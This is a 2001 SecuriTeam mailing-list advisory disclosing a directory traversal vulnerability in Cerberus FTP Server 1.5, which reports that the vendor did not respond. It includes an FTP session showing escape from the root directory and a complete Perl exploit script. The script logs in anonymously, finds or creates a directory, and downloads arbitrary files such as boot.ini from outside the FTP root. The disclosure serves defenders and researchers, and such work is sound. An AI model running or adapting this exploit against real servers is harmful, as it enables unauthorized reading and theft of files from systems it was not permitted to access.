[NT] Cerberus FTP Server Directory Traversal

From: support@securiteam.com
Date: 08/21/01 

From: support@securiteam.com
To: list@securiteam.com
Subject: [NT] Cerberus FTP Server Directory Traversal
Message-Id: <20010821054442.05389138BF@mail.der-keiler.de>
Date: Tue, 21 Aug 2001 07:44:42 +0200 (CEST)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -

  Cerberus FTP Server Directory Traversal
------------------------------------------------------------------------

SUMMARY

 <http://www.greenepa.net/~averett/cerberus.htm> Cerberus FTP Server is a
multithreaded Windows FTP server designed to use little CPU and memory. A
security vulnerability in the product allows attackers to traverse outside
the bounding FTP root directory.

DETAILS

Vulnerable systems:
Cerberus FTP Server version 1.5

Example:
220-Welcome to Cerberus FTP Server
220 Created by Grant Averett
Benutzer (192.168.0.2:(none)): anonymous
230 User anonymous logged in
ftp> ls
200 Port command received
150 Opening data connection
delphiown
226 Transfer complete
FTP: 11 Bytes empfangen in 0,00Sekunden 11000,00KB/s
ftp> cd delphiown/../../
250 Change directory ok
ftp> ls
200 Port command received
150 Opening data connection

As you can see, you need at least one valid directory, to break out of the
ftp root-dir.

Solution:
Author has been contacted on the 12th of August, no response was received.

Exploit:
#!usr/bin/perl

# this exploit will download files from
# the ftp server, even if they are outside of
# root directory.

use Net::FTP;

$loginname='anonymous';
$passwd='';

$dirname= '';

print "\n-----------------------------------\n";
print "Cerberus Ftp server 1.5\n";
print "directory traversal exploit\n";
print "by Christoph Heindl\n";
print "se00020\@fhs-hagenberg.ac.at\n";
print "-----------------------------------\n";
if (!$ARGV[0] || !$ARGV[1]){
 print "usage: cftpsploit.pl <host> <dir/file>\n";
 print " example: cftpsploit.pl 192.168.0.2 boot.ini\n";
 print " will download boot.ini from c:\ if server is running on drive
c\n";
 exit;
}

$ipaddr=$ARGV[0];
$ftp=Net::FTP->new($ipaddr, Timeout=>5);
if (!$ftp->login($loginname, $passwd)){
 die "\ncould not login\n";
}

print "searching for directory...";
foreach $dir ($ftp->ls()) {
 next unless ($ftp->cwd($dir));
 $dirname=$dir;
 $ftp->cwd('..');
}
if ($dirname eq '') {
 print "failed\n";
 print "trying to create pseudo dir...";
 $mkd=$ftp->mkdir('pseudo');
 if ($mkd) {
  print "ok\n";
  $dirname="pseudo";
 }
 else {
  print "failed\n";
  print "exiting...\n";
  exit(0);
 }
}
print "found dir\n";
print "dirname is: ".$dirname."\n";
$pathtofile=$dirname."/../../";
print "getting file...\n";
$ftp->get($pathtofile.$ARGV[1]);
$ftp->quit;
print "all done. file located in current dir";

ADDITIONAL INFORMATION

The information has been provided by
<mailto:Christoph.Heindl@fhs-hagenberg.ac.at> Christoph.Heindl.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.